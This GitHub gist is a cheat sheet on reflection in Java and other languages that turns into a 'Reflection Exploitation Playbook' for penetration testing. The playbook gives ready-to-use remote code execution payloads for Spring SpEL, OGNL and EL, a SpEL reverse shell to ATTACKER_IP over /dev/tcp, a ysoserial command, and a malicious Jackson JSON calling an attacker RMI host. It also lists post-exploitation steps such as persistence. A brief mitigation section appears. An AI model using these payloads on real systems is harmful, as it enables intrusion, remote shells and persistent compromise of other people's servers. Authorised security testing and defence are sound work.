Skip to content

Instantly share code, notes, and snippets.

@aravindkumarsvg

aravindkumarsvg/Reflection_Introspection-Cheatsheet.md

Created March 21, 2026 09:53
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save aravindkumarsvg/b9d1e86bf40cf5e75a05fd3e0e5f9685 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save aravindkumarsvg/b9d1e86bf40cf5e75a05fd3e0e5f9685 to your computer and use it in GitHub Desktop.
Download ZIP
Reflection, Introspection - Cheatsheet
Raw
Reflection_Introspection-Cheatsheet.md

Reflection & Related Concepts Cheat Sheet

What is Reflection?

Reflection allows a program to inspect and modify its own structure and behavior at runtime.

Reflection in Java

  • Inspect classes, methods, fields
  • Access private members
  • Invoke methods dynamically

Example

Class<?> clazz = Class.forName("com.example.MyClass");
Object obj = clazz.getDeclaredConstructor().newInstance();
Method method = clazz.getDeclaredMethod("sayHello");
method.invoke(obj);

Reflection in Other Languages

Python (Introspection)

type(obj)
dir(obj)
getattr(obj, "method")()

C

Type type = typeof(MyClass);
object obj = Activator.CreateInstance(type);

JavaScript

Reflect.get(obj, "name");

Go

reflect.TypeOf(obj)

C++

  • Limited (RTTI, templates)

Related Concepts

Concept Description

Introspection Inspect runtime objects Metaprogramming Code that modifies code Annotations Metadata on code Code Generation Generate code before runtime Macros Compile-time transformation

πŸ”₯ Reflection-Based Vulnerabilities

1. Java Deserialization Attacks

  • Uses reflection internally to instantiate objects
  • Attackers supply malicious serialized objects
  • Leads to Remote Code Execution (RCE)

Example

  • ysoserial payloads
  • Gadget chains (Commons Collections)

2. Spring Framework Exploits

  • Spring uses reflection for dependency injection
  • Exploits:
    • SpEL injection
    • Unsafe data binding
    • RCE via expression evaluation

βš”οΈ Real-World Attack Chains Using Reflection

Typical Flow

  1. User input reaches deserialization/API
  2. Reflection loads attacker-controlled class/method
  3. Gadget chain triggers execution
  4. Achieves RCE

Example Chain

  • Input β†’ Jackson deserialization β†’ Reflection β†’ Gadget β†’ Runtime.exec()

πŸ§ͺ Testing Reflection Abuse in VAPT

1. Identify Entry Points

  • Deserialization endpoints
  • Dynamic class loading
  • Expression evaluators

2. Payload Testing

  • Use ysoserial
  • Inject class names / method names

3. Look for:

  • Class.forName()
  • Method.invoke()
  • eval() / expression parsing

4. Tools

  • Burp Suite
  • ysoserial
  • custom fuzzers

5. Indicators of Vulnerability

  • Unexpected class loading
  • Stack traces revealing reflection usage
  • RCE or abnormal behavior

🧠 Key Tips

  • Reflection = powerful but dangerous
  • Prefer compile-time mechanisms where possible
  • Always validate inputs used in dynamic execution

Reflection Exploitation Playbook (VAPT)

1. Overview

This playbook provides step-by-step guidance to identify and exploit reflection-based vulnerabilities in applications.

2. Target Areas

2.1 Deserialization Endpoints

  • JSON (Jackson, Gson)
  • XML
  • Java serialized objects

2.2 Expression Engines

  • Spring SpEL
  • OGNL
  • MVEL

2.3 Dynamic Class Loading

  • Class.forName()
  • Custom plugin loaders

3. Step-by-Step Exploitation

Step 1: Identify Input Points

  • API endpoints
  • Headers
  • Cookies
  • File uploads

Step 2: Detect Reflection Usage

Indicators:

  • Stack traces containing:
    • java.lang.reflect.Method.invoke
    • Class.forName
  • Error messages revealing class names

Step 3: Test for Injection

Basic Payloads

${7*7}
#{7*7}

If evaluated β†’ expression injection exists.

4. Exploitation Techniques

4.1 SpEL Injection (Spring)

RCE Payload

T(java.lang.Runtime).getRuntime().exec("id")

Reverse Shell Example

T(java.lang.Runtime).getRuntime().exec("bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'")

4.2 Java Deserialization (ysoserial)

Generate Payload

java -jar ysoserial.jar CommonsCollections1 "id" > payload.bin

Send Payload

  • Upload endpoint
  • POST request body
  • Cookie/header injection

4.3 Jackson Exploit

Malicious JSON

{
  "@type": "com.sun.rowset.JdbcRowSetImpl",
  "dataSourceName": "rmi://ATTACKER_IP:1099/Exploit",
  "autoCommit": true
}

4.4 OGNL Injection (Struts)

#cmd='id'
#rt=@java.lang.Runtime@getRuntime()
#rt.exec(#cmd)

5. Full Attack Chain Example

  1. Identify JSON endpoint
  2. Detect deserialization (Jackson)
  3. Inject malicious @type
  4. Trigger reflection-based object creation
  5. Achieve RCE via gadget chain

6. Tools

  • Burp Suite
  • ysoserial
  • marshalsec
  • custom fuzzers

7. Detection Techniques

7.1 Automated

  • Scan for:
    • eval()
    • reflection APIs
    • unsafe deserialization

7.2 Manual

  • Review source code
  • Analyze stack traces

8. Post-Exploitation

  • Establish reverse shell
  • Privilege escalation
  • Persistence via cron/jobs

9. Mitigation

  • Disable unsafe deserialization
  • Use allowlists for classes
  • Avoid exposing expression evaluators
  • Sanitize inputs
  • Use security managers / sandboxing

10. Quick Payload List

SpEL

T(java.lang.Runtime).getRuntime().exec("id")

OGNL

@java.lang.Runtime@getRuntime().exec("id")

EL

${''.getClass().forName('java.lang.Runtime').getRuntime().exec('id')}

11. Pro Tips

  • Always chain vulnerabilities
  • Reflection alone is not exploitable --- needs input control
  • Focus on frameworks (Spring, Struts)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment